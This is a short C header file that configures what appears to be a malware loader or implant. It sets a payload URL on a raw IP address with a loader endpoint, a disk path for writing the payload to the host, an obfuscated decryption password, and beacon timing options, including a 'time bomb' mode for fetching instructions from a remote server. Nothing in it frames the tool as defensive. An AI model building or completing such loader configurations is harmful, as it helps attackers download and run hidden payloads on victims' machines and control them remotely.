#ifndef PREFERENCES_H
#define PREFERENCES_H

//---------------------------------------------------------------
// EDIT PAYLOAD SETTINGS HERE

#define PAYLOAD_URL "https://71.163.46.151:25566/api/loader1?send="
#define PATH_TO_WRITE "./demo_file" // path to write payload to on host disk (if not executable)
#define ENC_PASSWORD "\xff\xee\xfc\xfc\xf8\xe0\xfd\xeb\xbd" // symmetric password for decryption generated by passgen.py
#define BEACON_MODE 2 // 0 for instantly beacon once, any positive number x for beacon every x seconds, -1 to beacon at date/time
#define BEACON_DATE_TIME 0 // Unix epoch value for when to beacon (EX 1617309000 beacons Thu, 01 Apr 2021 16:30:00 EST)
                           // Note: BEACON_DATE_TIME only applies when BEACON_MODE is set to -1
#define BEACON_MODE_INITIAL 2 // same beaconing logic as above, but for initial beacon to get instructions
#define BEACON_DATE_TIME_INITIAL 0 // same as above, but for time bomb initial beacon for intstructions
#define BEACON_MODE_INSTRUCTIONS 2 // same beaconing logic as above, but for any subsequent beacon for instructions
#define BEACON_DATE_TIME_INSTRUCTIONS 0 // // same beaconing logic as above, but for any subsequent time bomb beacon for instructions


//----------------------------------------------------------------

#endif